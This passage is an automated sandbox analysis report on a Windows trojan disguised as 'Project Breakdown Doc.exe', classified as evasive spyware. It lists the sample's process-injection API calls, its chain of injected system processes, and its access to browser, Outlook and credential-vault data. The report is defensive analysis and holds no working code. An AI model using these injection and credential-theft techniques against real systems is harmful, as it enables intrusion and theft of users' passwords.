                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,1_2_03B72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CA40B1
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C98858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C98858
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CA545F
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4E8000_2_00C4E800
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6DBB50_2_00C6DBB5
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC804A0_2_00CC804A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4E0600_2_00C4E060
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C541400_2_00C54140
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C624050_2_00C62405
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C765220_2_00C76522
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC06650_2_00CC0665
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C7267E0_2_00C7267E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C568430_2_00C56843
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6283A0_2_00C6283A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C789DF0_2_00C789DF
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC0AE20_2_00CC0AE2
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C76A940_2_00C76A94
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C58A0E0_2_00C58A0E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C9EB070_2_00C9EB07
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA8B130_2_00CA8B13
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6CD610_2_00C6CD61
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C770060_2_00C77006
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C531900_2_00C53190
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C5710E0_2_00C5710E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C412870_2_00C41287
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C633C70_2_00C633C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6F4190_2_00C6F419
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C616C40_2_00C616C4
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C556800_2_00C55680
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C558C00_2_00C558C0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C678D30_2_00C678D3
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C61BB80_2_00C61BB8
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C79D050_2_00C79D05
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4FE400_2_00C4FE40
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C61FD00_2_00C61FD0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6BFE60_2_00C6BFE6
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_017836000_2_01783600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418D531_2_00418D53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E8EA1_2_0040E8EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E8F31_2_0040E8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E93C1_2_0040E93C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011801_2_00401180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029A01_2_004029A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032F01_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F3631_2_0042F363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041057A1_2_0041057A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004105831_2_00410583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026B01_2_004026B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416F431_2_00416F43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004107A31_2_004107A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E7A31_2_0040E7A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C003E61_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F01_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA3521_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC02C01_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE02741_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF41A21_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C001AA1_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF81CC1_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA1181_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B301001_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC81581_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD20001_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C01_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B407701_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B647501_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C6E01_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C005911_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B405351_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEE4F61_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE44201_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF24461_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF6BD71_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB401_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA801_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A01_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0A9A61_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B569621_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B268B81_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E8F01_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4A8401_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B428401_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBEFA01_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32FC81_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60F301_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE2F301_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B82F281_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4F401_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52E901_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFCE931_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEEDB1_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEE261_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40E591_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B58DBF1_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3ADE01_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDCD1F1_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4AD001_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0CB51_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30CF21_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40C001_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B8739A1_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF132D1_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2D34C1_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B452A01_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5D2F01_2_03B5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE12ED1_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B2C01_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4B1B01_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0B16B1_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2F1721_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7516C1_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF70E91_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF0E01_2_03BFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEF0CC1_2_03BEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B470C01_2_03B470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF7B01_2_03BFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF16CC1_2_03BF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B856301_2_03B85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C095C31_2_03C095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDD5B01_2_03BDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF75711_2_03BF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF43F1_2_03BFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B314601_2_03B31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FB801_2_03B5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB5BF01_2_03BB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7DBF91_2_03B7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFB761_2_03BFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDDAAC1_2_03BDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B85AA01_2_03B85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE1AA31_2_03BE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEDAC61_2_03BEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB3A6C1_2_03BB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFA491_2_03BFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7A461_2_03BF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD59101_2_03BD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B499501_2_03B49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B9501_2_03B5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B438E01_2_03B438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAD8001_2_03BAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFFB11_2_03BFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B41F921_2_03B41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD21_2_03B03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD51_2_03B03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFF091_2_03BFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B49EB01_2_03B49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FDC01_2_03B5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7D731_2_03BF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF1D5A1_2_03BF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B43D401_2_03B43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFCF21_2_03BFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB9C321_2_03BB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 107 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: String function: 00C68B40 appears 42 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: String function: 00C47F41 appears 35 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: String function: 00C60D27 appears 70 times
                Source: Project Breakdown Doc.exe, 00000000.00000003.1682781306.00000000041B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Project Breakdown Doc.exe
                Source: Project Breakdown Doc.exe, 00000000.00000003.1684004083.00000000043AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Project Breakdown Doc.exe
                Source: Project Breakdown Doc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@4/4
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAA2D5 GetLastError,FormatMessageW,0_2_00CAA2D5
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C98713 AdjustTokenPrivileges,CloseHandle,0_2_00C98713
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C98CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C98CC3
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CAB59E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CBF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CBF121
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00CB86D0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C44FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C44FE9
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeFile created: C:\Users\user\AppData\Local\Temp\autC5D4.tmpJump to behavior
                Source: Project Breakdown Doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: powercfg.exe, 00000006.00000003.2455621276.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2935230373.0000000002F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Project Breakdown Doc.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\Project Breakdown Doc.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"Jump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\powercfg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Project Breakdown Doc.exeStatic file information: File size 1368576 > 1048576
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Project Breakdown Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
